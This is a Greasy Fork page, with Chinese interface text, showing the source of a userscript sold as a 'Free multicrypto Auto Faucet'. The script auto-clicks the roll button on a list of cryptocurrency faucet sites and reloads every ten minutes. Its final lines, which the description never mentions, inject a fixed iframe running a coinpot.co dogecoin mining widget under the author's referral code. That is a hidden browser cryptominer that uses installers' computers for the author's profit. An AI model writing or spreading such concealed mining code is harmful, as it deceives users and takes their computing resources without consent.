Greasy Fork

Greasy Fork is available in English.

Free multicrypto Auto Faucet

Auto Faucet Script by CodeFred

当前为 2021-01-03 提交的版本,查看 最新版本

您需要先安装一款用户脚本管理器扩展,例如 Tampermonkey 篡改猴Greasemonkey 油猴子Violentmonkey 暴力猴,才能安装此脚本。

您需要先安装一款用户脚本管理器扩展,例如 Tampermonkey 篡改猴,才能安装此脚本。

您需要先安装一款用户脚本管理器扩展,例如 Tampermonkey 篡改猴Violentmonkey 暴力猴,才能安装此脚本。

您需要先安装一款用户脚本管理器扩展,例如 Tampermonkey 篡改猴Userscripts ,才能安装此脚本。

您需要先安装一款用户脚本管理器扩展,例如 Tampermonkey 篡改猴,才能安装此脚本。

您需要先安装一款用户脚本管理器扩展后才能安装此脚本。

(我已经安装了用户脚本管理器,让我安装!)

您需要先安装一款用户样式管理器扩展,比如 Stylus,才能安装此样式。

您需要先安装一款用户样式管理器扩展,比如 Stylus,才能安装此样式。

您需要先安装一款用户样式管理器扩展,比如 Stylus,才能安装此样式。

您需要先安装一款用户样式管理器扩展后才能安装此样式。

您需要先安装一款用户样式管理器扩展后才能安装此样式。

您需要先安装一款用户样式管理器扩展后才能安装此样式。

(我已经安装了用户样式管理器,让我安装!)

// ==UserScript==
// @name Free multicrypto Auto Faucet
// @description Auto Faucet Script by CodeFred
// @author CodeFred
// @version 1.4
// @namespace mailto:[email protected]
// @match https://freebitcoin.io/*
// @match https://freenem.com/*
// @match https://coinfaucet.io/*
// @match https://freecardano.com/*
// @match https://freesteam.io/*
// @match https://freetether.com/*
// @match https://free-ltc.com/*
// @match https://freeusdcoin.com/*
// @match https://freeneo.io/*
// @match https://freebinancecoin.com/*
// @match https://free-tron.com/*
// @match https://freebinancecoin.com/*
// @match https://freeethereum.com/*
// @match https://freedash.io/*
// @grant GM_setValue
// @grant GM_getValue
// ==/UserScript==


setTimeout(function() {
    'use strict';
    console.log(document.querySelector("div[class='roll-wrapper']").style.display !== 'none');

    if (document.querySelector("div[class='roll-wrapper']").style.display !== "none") {
        document.querySelector("button[class='main-button-2 roll-button bg-2']").click()
    }
    //every 10 minutes the page will be refreshed to check if you can roll again
    setTimeout(function(){ location.reload(); }, 10*60*1000);

},2000);

var iframe = document.createElement('iframe');
iframe.src="https://coinpot.co/mine/dogecoin/?ref=C965E7BC7B07&mode=widget";
iframe.style ="position:fixed; bottom:0; left:0;width:324px;height:300px;"
document.body.appendChild(iframe);